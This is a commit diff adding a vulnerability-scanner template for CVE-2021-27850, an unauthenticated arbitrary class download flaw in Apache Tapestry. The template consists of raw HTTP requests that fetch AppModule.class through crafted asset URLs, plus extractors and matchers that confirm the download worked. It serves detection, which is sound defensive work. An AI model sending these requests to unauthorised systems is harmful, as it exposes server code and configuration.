Merge pull request #1513 from projectdiscovery/CVE-2021-27850

Added CVE-2021-27850 - Apache Tapestry - Arbitrary class download
2021-05-21 09:09:42 +05:30 · 2021-05-21 09:09:42 +05:30 · baeea8930f
parent d7d86bbd95 26fc5c2dfa
commit baeea8930f
1 changed files with 57 additions and 0 deletions
--- a/cves/2021/CVE-2021-27850.yaml
+++ b/cves/2021/CVE-2021-27850.yaml
@ -0,0 +1,57 @@
+id: CVE-2021-27850
+
+info:
+  name: Apache Tapestry - Arbitrary class download
+  description: |
+    A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
+  author: pdteam
+  severity: critical
+  reference: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
+  tags: cve,cve2021,apache,tapestry
+
+requests:
+  - raw:
+      - |
+        GET /assets/app/something/services/AppModule.class/ HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+      - |
+        GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+
+    extractors:
+      - type: regex
+        regex:
+          - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
+        internal: true
+        name: id
+        part: header
+        group: 1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'application/java'
+        part: header
+
+      - type: word
+        words:
+          - 'configuration'
+          - 'webtools'
+        part: body
+        condition: and